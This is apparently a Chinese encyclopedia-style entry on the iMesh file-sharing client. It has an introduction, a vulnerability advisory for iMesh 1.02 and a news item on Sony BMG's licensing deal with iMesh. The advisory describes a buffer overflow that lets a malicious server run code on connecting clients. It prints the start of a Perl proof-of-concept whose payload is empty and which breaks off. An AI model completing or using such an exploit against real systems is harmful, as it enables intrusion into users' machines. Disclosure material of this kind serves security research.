简介iMesh是一个文件分享软件。能够让你设定分享文件的类型,音乐、影片或其他文件;也能够让你搜寻并且下载你想要的文件。由于iMesh只是一个交换文件的机制,所有的文件其实还是在个人的电脑里面,因此网络组态的设定就显得相当重要。如果你在公司内部使用iMesh的话,一定要设定好防火墙(Firewall),ADSL、Cable Modem连接网络的人应该不会有问题,大多可以顺利交换文件。iMesh只支持英文,没有办法搜寻中文,所以就算你把中文文件分享出去,别人也没办法找到!
iMesh 是点对点的虚拟在线社区,一个成员可以搜索和下载另一个成员 PC 上的数字媒体文件和其他文件,也可以从自己的 PC 上载和共享这些文件。几乎任何类型的文件都可以共享:音频、视频、游戏、软件、文档:可以共享能够识别的任何文件格式。
iMesh 1.02漏洞受影响系统:
iMesh 1.02
描述:
iMesh 1.02中存在一个缓冲区溢出漏洞,攻击者可能执行任意代码。
当iMesh客户端连结到一个服务器时,服务器可以利用这个漏洞来攻
击iMesh客户,并可能在iMesh客户端正在运行的主机上执行任意命令。
<* 来源: Chopsui-cide[MmM] 2000
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/perl
#
# iMesh 1.02 vulnerability
# Chopsui-cide[MmM] 2000
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
# A buffer overflow exists in iMesh 1.02 that allows the execution
# of arbitrary code. When the iMesh client connects to a server,
# the server is able to exploit the vulnerability and execute
# arbitrary code on the system the client is running on.
#
use IO::Socket;
$localhost = "localhost";
$port = "5000";
# Dummy payload
$payload = "";[1]
相关事件索尼贝塔斯曼与P2P网站iMesh已达成授权协议
美国东部时间7月8日(北京时间7月9日)消息,本周五,音乐巨头索尼/贝塔斯曼公司宣布与文件交换服务商iMesh达成授权协议,这是自美国法院打击在线版权侵权活动以来首个授权协议。
此前,美国法院指出,Grokster等网站应对用户的版权侵权行为负责。业内分析师称,此决定进一步推动了媒体公司制造网站的活动。
iMesh成立于1999年,是后Napster时期最为著名的文件交换网站。2003年,音像界起诉该网站侵犯版权,要求其赔偿4100万美元。
6月27日,美国法院做出了有利于娱乐公司而不利于文件交换网站的决定后,iMesh宣布退出受到业内“制裁”的文件交换服务。同时,iMesh公司还雇佣索尼娱乐公司前总裁Robert Summer担任公司主席,负责与音乐界进行交涉。
索尼贝塔斯曼公司,是业内第四大唱片公司,是由索尼和贝塔斯曼公司成立的合资公司。音乐杂志“电子公告栏”本周五称,在未来10天内iMesh还与环球唱片公司达成协议。对此,iMesh公司代表未发表评论。
其它的P2P网站采取措施不得不满足娱乐公司的赔偿的要求,比如Mashboxx网站,已与索尼贝塔斯曼公司达成授权协议。2001年,音乐界就关闭了业内第一个文件交换网站Napster,然后与Napster的继承者
Grokster和Streamcast对簿公堂。因此,Napster开始转型,成为一家商业化在线音乐网站。
